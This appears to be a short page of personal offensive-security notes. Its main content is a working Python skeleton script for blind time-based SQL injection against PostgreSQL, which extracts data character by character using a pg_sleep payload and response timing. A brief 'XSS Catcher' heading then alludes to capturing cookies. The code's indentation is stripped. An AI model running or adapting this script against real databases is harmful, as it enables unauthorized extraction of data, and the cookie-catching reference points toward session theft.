My Own Skeleton Scripts
Blind Time Based SQL Injection (PostgreSQL example)
import requests
url = "" # change this
letters = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789"
sqling = True
position = 1
result = ""
while sqling:
for letter in letters:
# define paylod
sqli_payload = "(SELECT CASE WHEN SUBSTRING(version(),"+ str(position) +",1)=$$" + letter + "$$ THEN (SELECT NULL FROM pg_sleep(5)) ELSE $$$$ END)-- -" # change this
# send request
r_sqli = requests.get(url + "/endpoint?param=" + sqli_payload, verify=False) # change this
# if character is correct
if r_sqli.elapsed.total_seconds() > 5:
result += letter
position += 1
print(result)
break
# end loop if not found
if letter == '9':
sqling = FalseXSS Catcher
You can also not use threading and put method call in send function (also it is required to cut the cookie)
Last updated